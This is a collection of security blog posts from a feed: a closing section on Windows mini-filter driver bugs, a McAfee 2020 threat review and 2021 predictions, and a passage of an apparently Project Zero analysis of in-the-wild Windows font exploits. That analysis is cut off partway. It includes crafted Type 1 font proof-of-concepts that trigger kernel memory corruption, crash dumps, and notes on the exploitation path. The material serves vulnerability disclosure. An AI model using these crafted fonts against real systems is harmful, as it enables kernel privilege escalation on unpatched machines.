The only thing which prevents a user-mode application from doing this is the kernel checks that the handle passed by the application to the NtWriteFile system call has the FILE_WRITE_DATA access right set. If not the system call can return STATUS_ACCESS_DENIED. However, if the handle has write access to a file object, but the filter driver redirects that operation to a read-only file then the check is bypassed and the user can write to a file they don’t necessarily control.

Another place this can happen is the dispatch of IO control codes. Each control code has a flag which indicates if the file handle requires read and/or write access to be dispatched. This check is performed in the IO manager before the request ever makes it to the file system. If the filter drivers blindly forward IO control codes to a separate file it could send a code which normally requires write access on the handle bypassing security checks.

The LUAFV driver is a good example of a mini-filter driver where this forwarding takes place. The previously mentioned issue, CVE-2019-0836 while it’s a concurrency issue also relies on the fact that the file object can be written to even though it was opened read-only.

Summary

In summary I think that mini-filter drivers are an under-appreciated source of privilege escalation bugs on Windows. In part that’s because they’re not easy to understand. They have complex interactions with the rest of the IO system which makes understanding difficult but can introduce really subtle and interesting issues. I hope I’ve given you enough information to better understand how mini-filter drivers function, how you communicate with them and what sorts of unique bug classes you might discover.

If you want some more information a good blog on the inner workings of filters drivers is Of Filesystems and Other Demons. It’s not been updated in a long while but it still contains some valuable information. You can also refer to MSDN which has a fairly comprehensive section on mini-filters as well as the Windows Driver Kit sample code. Finally as a reminder I’ve uploaded a filter manager header file for use in reverse engineering tools such as IDA Pro.

A Year in Review: Threat Landscape for 2020

14 January 2021 at 14:00

As we gratefully move forward into the year 2021, we have to recognise that 2020 was as tumultuous in the digital realm as it has in the physical world. From low level fraudsters leveraging the pandemic as a vehicle to trick victims into parting with money for non-existent PPE, to more capable actors using malware that has considerably less prevalence in targeted campaigns. All of which has been played out at a time of immense personal and professional difficulties for millions of us across the world.

Dealing with the noise

What started as a trickle of phishing campaigns and the occasional malicious app quickly turned to thousands of malicious URLs and more-than-capable threat actors leveraging our thirst for more information as an entry mechanism into systems across the world. There is no question that COVID was the dominant theme of threats for the year, and whilst the natural inclination will be to focus entirely on such threats it is important to recognise that there were also very capable actors operating during this time.

For the first time we made available a COVID-19 dashboard to complement our threat report to track the number of malicious files leveraging COVID as a potential lure.  What this allows is real time information on the prevalence of such campaigns, but also clarity about the most targeted sectors and geographies.  Looking at the statistics from the year clearly demonstrates that the overarching theme is that the volume of malicious content increased.

Whilst of course this a major concern, we must recognise that there were also more capable threat actors operating during this time.

Ransomware – A boom time

The latter part of 2020 saw headlines about increasing ransom demands and continued successes from ransomware groups. An indication as to the reason why was provided in early 2020 in a blog published by Thomas Roccia that revealed “The number of RDP ports exposed to the Internet has grown quickly, from roughly three million in January 2020 to more than four and a half million in March.”

With RDP a common entry vector used predominantly by post intrusion ransomware gangs, there appears some explanation as to the reason why we are seeing more victims in the latter part of 2020.   Indeed, in the same analysis from Thomas we find that the most common passwords deployed for RDP are hardly what we would regard as strong.

If we consider the broader landscape of RDP being more prevalent (we have to assume due to the immediate need for remote access due to the lockdowns across the globe), the use of weak credentials, then the success of ransomware groups become very evident.  Indeed, later in the year we detailed our research into the Netwalker ransomware group that reveals the innovation, affiliate recruitment and ultimately financial success they were able to gain during the second quarter of 2020.

A year of major vulnerabilities

The year also provided us with the added gifts of major vulnerabilities. In August, for example, there was a series of zero-day vulnerabilities in a widely used, low-level TCP/IP software library developed by Treck, Inc.  Known as Ripple 20, the affect to hundreds of millions of devices resulted in considerable concern related to the wider supply chain of devices that we depend upon. In collaboration with JSOF, the McAfee ATR team developed a Detection Logic and Signatures for organizations to detect these vulnerabilities.

Of course the big vulnerabilities did not end there; we had the pleasure of meeting BadNeighbour, Drovorub, and so many more. The almost seemingly endless stream of vulnerabilities with particularly high CVSS Scores has meant that the need to patch very high on the list of priorities.

The ‘sophisticated’ attacker

As we closed out 2020, we were presented with details of ‘nation states’ carrying out sophisticated attacks.   Whilst under normal circumstances such terminology is something that should be avoided, there is no question that the level of capability we witness from certain threat campaigns are a world away from the noisy COVID phishing scams.

In August of 2020, we released the MVISION Insights dashboard which provides a free top list of campaigns each week. This includes, most recently, tracking against the SUNBURST trojan detailed in the SolarWinds attack, or the tools stolen in the FireEye breach.   What this demonstrates is that whilst prevalence is a key talking point, there exists capable threat actors targeting organizations with real precision.

For example, the Operation North Star campaign in which the threat actors deployed an Allow and Block list of targets in order to limit those they would infect with a secondary implant.

The term sophisticated is overused, and attribution is often too quickly relegated to the category of nation state.  However, the revelations have demonstrated that there are those campaigns where the attack did use capabilities not altogether common and we are no doubt witnessing a level of innovation from threat groups that is making the challenge of defence harder.

What is clear is that 2020 was a challenging year, but as we try and conclude what 2021 has in store, we have to celebrate the good news stories.   From initiatives such as No More Ransom continuing to tackle ransomware, to the unprecedented accessibility of tools that we can all use to protect ourselves (e.g. please check ATR GitHub repo, but recognise there are more).

McAfee 2021 Threat Predictions

Our experts share their 2021 predictions for the new year and how to protect yourself and your enterprise.

Read Now

 

The post A Year in Review: Threat Landscape for 2020 appeared first on McAfee Blog.

2021 Threat Predictions Report

By: McAfee
13 January 2021 at 09:00

The December 2020 revelations around the SUNBURST campaigns exploiting the SolarWinds Orion platform have revealed a new attack vector – the supply chain – that will continue to be exploited.

The ever-increasing use of connected devices, apps and web services in our homes will also make us more susceptible to digital home break-ins. This threat is compounded by many individuals continuing to work from home, meaning this threat not only impacts the consumer and their families, but enterprises as well.

Attacks on cloud platforms and users will evolve into a highly polarized state where they are either “mechanized and widespread” or “sophisticated and precisely handcrafted”.

Mobile users will need to beware of phishing or smishing messages aimed at exploiting and defrauding them through mobile payment services.

The use of QR codes has notably accelerated during the pandemic, raising the specter of a new generation of social engineering techniques that seek to exploit consumers and gain access to their personal data.

Finally, the most sophisticated threat actors will increasingly use social networks to target high value individuals working in sensitive industry sectors and roles.

A new year offers hope and opportunities for consumers and enterprises, but also more cybersecurity challenges. I hope you find these helpful in planning your 2021 security strategies.

–Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research 

Twitter @Raj_Samani 

2021 Predictions  

1.

Supply Chain Backdoor Techniques to Proliferate 

By Steve Grobman 

The revelations around the SolarWinds-SUNBURST espionage campaign will spark a proliferation in copycat supply chain attacks of this kind 

On December 13, 2020, the cybersecurity industry learned nation-state threat actors had compromised SolarWinds’s Orion IT monitoring and management software and used it to distribute a malicious software backdoor called SUNBURST to dozens of that company’s customers, including several high-profile U.S. government agencies.  

This SolarWinds-SUNBURST campaign is the first major supply chain attack of its kind and has been referred to by many as the “Cyber Pearl Harbor” that U.S. cybersecurity experts have been predicting for a decade and a half 

The campaign also represents a shift in tactics where nation state threat actors have employed a new weapon for cyber-espionage. Just as the use of nuclear weapons at the end of WWII changed military strategy for the next 75 years, the use of a supply chain attack has changed the way we need to consider defense against cyber-attacks.  

This supply chain attack operated at the scale of a worm such as WannaCry in 2017, combined with the precision and lethality of the 2014 Sony Pictures or 2015 U.S. government Office of Personnel Management (OPM) attacks. 

Within hours of its discovery, the magnitude of the campaign became frighteningly clear to organizations responsible for U.S. national security, economic competitiveness, and even consumer privacy and security.  

It enables U.S. adversaries to steal all manners of information, from inter-governmental communications to national secrets. Attackers can, in turn, leverage this information to influence or impact U.S. policy through malicious leaks. Every breached agency may have different secondary cyber backdoors planted, meaning that there is no single recipe to evict the intrusion across the federal government. 

While some may argue that government agencies are legitimate targets for nation-state spy craft, the campaign also impacted private companies. Unlike government networks which store classified information on isolated networks, private organizations often have critical intellectual property on networks with access to the internet. Exactly what intellectual property or private data on employees has been stolen will be difficult to determine, and the full extent of the theft may never be known. 

This type of attack also poses a threat to individuals and their families given that in today’s highly interconnected homes, a breach of consumer electronics companies can result in attackers using their access to smart appliances such as TVs, virtual assistants, and smart phones to steal their information or act as a gateway to attack businesses while users are working remotely from home. 

What makes this type of attack so dangerous is that it uses trusted software to bypass cyber defenses, infiltrate victim organizations with the backdoor and allow the attacker to take any number of secondary steps. This could involve stealing data, destroying data, holding critical systems for ransom, orchestrating system malfunctions that result in kinetic damage, or simply implanting additional malicious content throughout the organization to stay in control even after the initial threat appears to have passed. 

McAfee believes the discovery of the SolarWinds-SUNBURST campaign will expose attack techniques that other malicious actors around the world will seek to duplicate in 2021 and beyond. 

 

2.

Hacking the Home to Hack the Office 

By Suhail Ansari, Dattatraya Kulkarni and Steve Povolny 

 The increasingly dense overlay of numerous connected devices, apps and web services used in our professional and private lives will grow the connected home’s attack surface to the point that it raises significant new risks for individuals and their employers. 

 While the threat to connected homes is not new, what is new is the emergence of increased functionality in both home and business devices, and the fact that these devices connect to each other more than ever before. Compounding this is the increase in remote work – meaning many of us are using these connected devices more than ever. 

In 2020,the global pandemic shifted employees from the office to the home, making the home environment a work environment. In fact, since the onset of the coronavirus pandemic, McAfee Secure Home Platform device monitoring shows a 22% increase in the number of connected home devices globally and a 60% increase in the U.S. Over 70% of the traffic from these devices originated from smart phones, laptops, other PCs and TVs, and over 29% originated from IoT devices such as streaming devices, gaming consoles, wearables, and smart lights.

McAfee saw cybercriminals increase their focus on the home attack surface with a surge in various phishing message schemes across communications channels. The number of malicious phishing links McAfee blocked grew over 21% from March to Novemberat an average of over 400 links per home.  

 This increase is significant and suggests a flood of phishing messages with malicious links entered home networks through devices with weaker security measures 

 Millions of individual employees have become responsible for their employer’s IT security in a home office filled with soft targetsunprotected devices from the kitchen, to the family room, to the bedroomMany of these home devices are “orphaned” in that their manufacturers fail to properly support them with security updates addressing new threats or vulnerabilities.  

This contrasts with a corporate office environment filled with devices “hardened” by enterprise-grade security measures. We now work with consumer-grade networking equipment configured by “us” and lacking the central management, regular software updates and security monitoring of the enterprise.   

Because of this, we believe cybercriminals will advance the home as an attack surface for campaigns targeting not only our families but also corporations. The hackers will take advantage of the home’s lack of regular firmware updates, lack of security mitigation features, weak privacy policies, vulnerability exploits, and user susceptibility to social engineering.  

By compromising the home environment, these malicious actors will launch a variety of attacks on corporate as well as consumer devices in 2021. 

 

3.

Attacks on Cloud Platforms Become Highly Mechanized and Handcrafted 

By Sandeep Chandana  

Attacks on cloud platforms will evolve into a highly polarized state where they are either “mechanized and widespread” or “targeted and precisely handcrafted”.  

The COVID-19 pandemic has also hastened the pace of the corporate IT transition to the cloud, accelerating the potential for new corporate cloud-related attack schemes. With increased cloud adoption and the large number of enterprises working from home, not only is there a growing number of cloud users but also a lot more data both in motion and being transacted.  

 McAfee cloud usage data from more than 30 million McAfee MVISION Cloud users worldwide shows a 50% increase overall in enterprise cloud use across all industries the first four months of 2020. Our analysis showed an increase across all cloud categories, usage of collaboration services such as Microsoft O365 by 123%, increase in use of business services such as Salesforce by 61% and the largest growth in collaboration services such as Cisco Webex (600%), Zoom (+350%), Microsoft Teams (+300%), and Slack (+200%). From January to April 2020, corporate cloud traffic from unmanaged devices increased 100% across all verticals.  

 During the same period, McAfee witnessed a surge in attacks on cloud accounts, an estimated 630% increase overall, with variations in the sectors that were targeted. Transportation led vertical industries with a 1,350% increase in cloud attacks, followed by education (+1,114%), government (+773%), manufacturing (+679%), financial services (+571%) and energy and utilities (+472%).  

The increasing proportion of unmanaged devices accessing the enterprise cloud has effectively made home networks an extension of the enterprise infrastructure. Cybercriminals will develop new, highly mechanized, widespread attacks for better efficacy against thousands of heterogenous home networks.  

One example could be a widespread brute force attack against O365 users, where the attacker seeks to leverage stolen credentials and exploit users’ poor practice of re-using passwords across different platforms and applications. As many as 65% of users reuse the same password for multiple or all accounts according to a 2019 security survey conducted by Google. Where an attacker would traditionally need to manually encode first and last name combinations to find valid usernames, a learning algorithm could be used to predict O365 username patterns.  

Additionally, cybercriminals could use AI and ML to bypass traditional network filtering technologies deployed to protect cloud instances. Instead of launching a classic brute force attack from compromised IPs until the IPs are blocked, resource optimization algorithms will be used to make sure the compromised IPs launch attacks against multiple services and sectors, to maximize the lifespan of compromised IPs used for the attacks. Distributed algorithms and reinforcement learning will be leveraged to identify attack plans primarily focused on avoiding account lockouts.   

McAfee also predicts that, as enterprise cloud security postures mature, attackers will be forced to handcraft highly targeted exploits for specific enterprises, users and applications.  

The recent Capital One breach was an example of an advanced attack of this kind. The attack was thoroughly cloud-native. It was sophisticated and intricate in that a number of vulnerabilities and misconfigurations across cloud applications (and infrastructure) were exploited and chained. It was not a matter of chance that the hackers were successful, as the attack was very well hand-crafted.  

 We believe attackers will start leveraging threat surfaces across devices, networks and the cloud in these ways in the months and years ahead. 

4.

New Mobile Payment Scams

By Suhail Ansari and Dattatraya Kulkarni

As users become more and more reliant on mobile payments, cybercriminals will increasingly seek to exploit and defraud users with scam SMS phishing or smishing messages containing malicious payment URLs.

 Mobile payments have become more and more popular as a convenient mechanism to conduct transactions. Worldpay Global Payments Report for 2020 estimated that 41% of payments today are on mobile devices, and this number looks to increase  at the expense of traditional credit and debit cards by 2023. An October 2020 study by Allied Market Research found that the global mobile payment market size was valued at $1.48 trillion in 2019, and is projected to reach $12.06 trillion by 2027, growing at a compound annual growth rate of 30.1% from 2020 to 2027.  

Additionally, the COVID-19 pandemic has driven the adoption of mobile payment methods higher as consumers have sought to avoid contact-based payments such as cash or physical credit cards. 

But fraudsters have followed the money to mobile, pivoting from PC browsers and credit cards to mobile payments. According to research by RSA’s Fraud and Risk Intelligence team, 72% of cyber fraud activity involved the mobile channel in the fourth quarter of 2019. The researchers observed that this represented “the highest percentage of fraud involving mobile apps in nearly two years and underscores a broader shift away from fraud involving web browsers on PCs.” 

McAfee predicts there will be an increase in “receive”-based mobile payment exploits, where a user receives a phishing email, direct message or smishing message telling him that he can receive a payment, transaction refund or cash prize by clicking on a malicious payment URL. Instead of receiving a payment, however, the user has been conned into sending a payment from his account.  

This could take shape in schemes where fraudsters set up a fake call center using a product return and servicing scam, where the actors send a link via email or SMS, offering a refund via a mobile payment app, but the user is unaware that they are agreeing to pay versus receiving a refund. The figures below show the fraudulent schemes in action.  

Mobile wallets are making efforts to make it easier for users to understand whether they are paying or receiving. Unfortunately, as the payment methods proliferate, fraudsters succeed in finding victims who either cannot distinguish credit from debit or can be prompted into quick action by smart social engineering.  

Governments and banks are making painstaking efforts to educate users to understand the use of one-time passwords (OTPs) and that they should not be shared. Adoption of frameworks such as caller ID authentication (also known as STIR/SHAKEN) help in ensuring that the caller ID is not masked by fraudsters, but they do not prevent a fraudster from registering an entity that has a name close to the genuine provider of service. 

In the same way that mobile apps have simplified the ability to conduct transactions, McAfee predicts the technology is making it easier to take advantage of the convenience for fraudulent purposes. 

5.

Qshing: QR Code Abuse in the Age of COVID 

By Suhail Ansari and Dattatraya Kulkarni 

Cybercriminals will seek new and ever cleverer ways to use social engineering and QR Code practices to gain access to consumer victims’ personal data. 

The global pandemic has created the need for all of us to operate and transact in all areas of our lives in a “contactless” way. Accordingly, it should come as no surprise that QR codes have emerged as a convenient input mechanism to make mobile transactions more efficient.  

QR code usage has proliferated into many areas, including payments, product marketing, packaging, restaurants, retail, and recreation just to name a few. QR codes are helping limit direct contact between businesses and consumers in every setting from restaurants to personal care salons, to fitness studios. They allow them to easily scan the code, shop for services or items offered, and easily purchase them.  

September 2020 survey by MobileIron found that 86% of respondents scanned a QR code over the course of the previous year and over half (54%) reported an increase in the use of such codes since the pandemic began. Respondents felt most secure using QR codes at restaurants or bars (46%) and retailers (38%). Two-thirds (67%) believe that the technology makes life easier in a touchless world and over half (58%) wish to see it used more broadly in the future.  

In just the area of discount coupons, an estimated 1.7 billion coupons using QR codes were scanned globally in 2017, and that number is expected to increase by a factor of three to 5.3 billion by 2022In just four years, from 2014 to 2018, the use of QR codes on consumer product packaging in Korea and Japan increased by 83%The use of QR codes in such “smart” packaging is increasing at an annual rate of 8% globally.  

In India, the governments Unique Identification Authority of India (UIDAI) uses QR codes in association with Aadhaar, India’s unique ID number, to enable readers to download citizens’ demographic information as well as their photographs. 

However, the technicalities of QR codes are something of a mystery to most users, and that makes them potentially dangerous if cybercriminals seek to exploit them to target victims.  

The MobileIron report found that whereas 69% of respondents believe they can distinguish a malicious URL based on its familiar text-based format, only 37% believe they can distinguish a malicious QR code using its unique dot pattern formatGiven that QR codes are designed precisely to hide the text of the URL, users find it difficult to identify and even suspect malicious QR codes. 

Almost two-thirds (61%) of respondents know that QR codes can open a URL and almost half (49%) know that a QR code can download an application. But fewer than one-third (31%) realize that a QR code can make a payment, cause a user to follow someone on social media (22%), or start a phone call (21%). A quarter of respondents admit scanning a QR code that did something unexpected (such as take them to a suspicious website), and 16% admitted that they were unsure if a QR code actually did what it was intended to do. 

It is therefore no surprise that QR codes have been used in phishing schemes to avoid anti-phishing solutions’ attempts to identify malicious URLs within email messages. They can also be used on webpages or social media. 

In such schemes, victims scan fraudulent QRs and find themselves taken to malicious websites where they are asked to provide login, personal info, usernames and passwords, and payment information, which criminals then steal. The sites could also be used to simply download malicious programs onto a user’s device.  

McAfeepredicts that hackers will increasingly use these QR code schemes and broaden them using social engineeringtechniques. For instance, knowing that businessownersarelookingtodownload QR code generator apps, bad actorswillenticeconsumersinto downloading malicious QR code generator appsthat pretend to do the same.In the process of generating the QR code (or even pretending to be generating the correct QR code), the malicious apps will steal thevictim’s sensitive data, which scammers could then use for a variety of fraudulent purposes.  

Although the QR codes themselves are a secure and convenient mechanism, we expect them to be misused by bad actors in 2021 and beyond. 

6.

Social Networks as Workplace Attack Vectors  

By Raj Samani 

McAfee predicts that sophisticated cyber adversaries will increasingly target, engage and compromise corporate victims using social networks as an attack vector.  

Cyber adversaries have traditionally relied heavily on phishing emails as an attack vector for compromising organizations through individual employees. However, as organizations have implemented spam detection, data loss prevention (DLP) and other solutions to prevent phishing attempts on corporate email accounts, more sophisticated adversaries are pivoting to target employees through social networking platforms to which these increasingly effective defenses cannot be applied. 

McAfee has observed such threat actors increasingly using the messaging features of LinkedIn, What’s App, Facebook and Twitter to engage, develop relationships with and then compromise corporate employees. Through these victims, adversaries compromise the broader enterprises that employ them. McAfee predicts that such actors will seek to broaden the use of this attack vector in 2021 and beyond for a variety of reasons.  

Malicious actors have used the social network platforms in broad scoped schemes to perpetrate relatively low-level criminal scams. However, prominent actors such as APT34Charming Kitten, and Threat Group-2889 (among others) have been identified using these platforms for higher-value, more targeted campaigns on the strength of the medium’s capacity for enabling customized content for specific types of victims.  

Operation North Star demonstrates state-of-the-art attack of this kind. Discovered and exposed by McAfee in August 2020, the campaign showed how lax social media privacy controls, ease of development and use of fake LinkedIn user accounts and job descriptions could be used to lure and attack defense sector employees. 

Just as individuals and organizations engage potential consumer customers on social platforms by gathering information, developing specialized content, and conducting targeted interactions with customers, malicious actors can similarly use these platform attributes to target high value employees with a deeper level of engagement.  

Additionally, individual employees engage with social networks in a capacity that straddles both their professional and personal lives. While enterprises assert security controls over corporate-issued devices and place restrictions on how consumer devices access corporate IT assets, user activity on social network platforms is not monitored or controlled in the same way. As mentioned, LinkedIn and Twitter direct messaging will not be the only vectors of concern for the corporate security operations center (SOC). 

While it is unlikely that email will ever be replaced as an attack vector, McAfee foresees this social network platform vector becoming more common in 2021 and beyond, particularly among the most advanced actors. 

 

The post 2021 Threat Predictions Report appeared first on McAfee Blog.

In-the-Wild Series: Windows Exploits

By: Ryan
12 January 2021 at 17:37

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

Background

The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[2];

  Fixed16_16 values[2];

  for (int i = 0; i < g_font->numMasters; i++) {

    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];

  }

  for (int i = 0; i < 2; i++) {

    int values_read = GetOpenFixedArray(values, g_font->numMasters);

    if (values_read != g_font->numMasters) {

      return -8;

    }

    for (int num = 0; num < g_font->numMasters; num++) {

      ptrs[num][i] = values[num];

    }

  }

  return 0;

}

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0–16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

...

RSP + 0x30

ptrs[0]

RSP + 0x38

ptrs[1]

RSP + 0x40

saved RDI

RSP + 0x48

return address

RSP + 0x50

values[0 .. 1]

RSP + 0x58

saved RBX

RSP + 0x60

saved RSI

...

The green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/WeightVector [0 0 0 0 0] def

/Private begin

/Blend begin

/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

The first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.

Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141

rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000

rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000

 r8=0000000000000000  r9=000000000000000e r10=0000000000000000

r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei pl nz na po cy

ATMFD+0x22144:

fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????

Resetting default scope

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  SetNumMasters(num_master);

  for (int i = 0; i < num_master; i++) {

    procs->BlendDesignPositions(i, &values[i]);

  }

  return 0;

}

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]

/Private begin

/Blend begin

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

In the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.

Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000

rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000

rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002

 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000

r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei ng nz na po nc

ffffffff`41414141 ??              ???

Resetting default scope

Exploitation

According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000

PXE at FFFFF6FB7DBEDF90          

contains 0000000115879863    

pfn 115879    ---DA--KWEV    

PPE at FFFFF6FB7DBF2000

contains 0000000115878863

pfn 115878    ---DA--KWEV

PDE at FFFFF6FB7E400000

contains 0000000115877863

pfn 115877    ---DA--KWEV

PTE at FFFFF6FC80000000

contains 8000000115976863

pfn 115976    ---DA--KW-V

